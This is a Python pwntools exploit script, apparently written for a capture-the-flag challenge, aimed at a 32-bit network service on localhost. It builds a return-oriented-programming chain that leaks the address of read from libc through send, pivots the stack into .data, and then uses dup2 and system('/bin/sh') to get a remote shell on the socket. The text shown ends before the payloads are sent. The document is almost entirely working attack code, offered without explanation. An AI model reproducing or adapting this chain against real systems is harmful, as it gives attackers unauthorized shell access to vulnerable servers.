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Created December 21, 2014 09:21
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from pwn import *
from pwnlib.tubes.remote import remote
from struct import pack, unpack
from time import sleep
def main():
t = remote('localhost', 2233, timeout=1000)
# 0x80487c0 <read@plt>: jmp DWORD PTR ds:0x804c010
read_got = 0x804c010
send_plt = 0x8048a20 # 08048a20 <send@plt>
# 000db460 <__read>
# 00040100 <__libc_system>
# .data = 0x804c0c0
# use data 0x804c7c0
ret = 0x804877f
popret = 0x8048796
pop2ret = 0x8048d93
pop3ret = 0x804926b
pop4ret = 0x804a7dc
leaveret = 0x8048a89
p1 = ''
p1 += 'a'*72
p1 += '938d0408' # pop2ret 0x8048d93
p1 += 'a'*8
p1 += '08d00408' # 0x0804d008 hash list address
p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
p1 += 'dca70408' #pop4ret
p1 += '04000000' #4
p1 += '10c00408' #read_got
p1 += '04000000' #4
p1 += '00000000' #0
p1 += 'c0870408' #read@plt
p1 += 'dca70408' #pop4ret
p1 += '04000000' #fd
p1 += 'c0c70408'
p1 += '00040000' #size
p1 += 'c0c70408'
p1 += '898a0408' #leave, ret;
p1 += '\r\n' # end
read_addr = unpack('<I', t.recv(4))[0]
libc_base = read_addr - 0x0db460
system_addr = libc_base + 0x40100
binsh_addr = libc_base + 0x1612c4
dup2_addr = libc_base + 0xdbe20 # 000dbe20 <__dup2>:
print "[*] read address: %s" % hex(read_addr)
print "[*] system address: %s" % hex(system_addr)
print "[*] binsh address: %s" % hex(binsh_addr)
p2 = ''
p2 += pack('<I', 0xdeadbeaf) # .data
p2 += pack('<I', dup2_addr) # dup2(4,0)
p2 += pack('<I', pop2ret) # pop2ret
p2 += pack('<I', 4)
p2 += pack('<I', 0)
p2 += pack('<I', dup2_addr) # dup2(4,1)
p2 += pack('<I', pop2ret) # pop2ret
p2 += pack('<I', 4)
p2 += pack('<I', 1)
p2 += pack('<I', dup2_addr) # dup2(4,2)
p2 += pack('<I', pop2ret) # pop2ret
p2 += pack('<I', 4)
p2 += pack('<I', 2)
p2 += pack('<I', system_addr) #system('/bin/sh')
p2 += pack('<I', 0xdeadbeaf)
p2 += pack('<I', binsh_addr)
if __name__ == '__main__':
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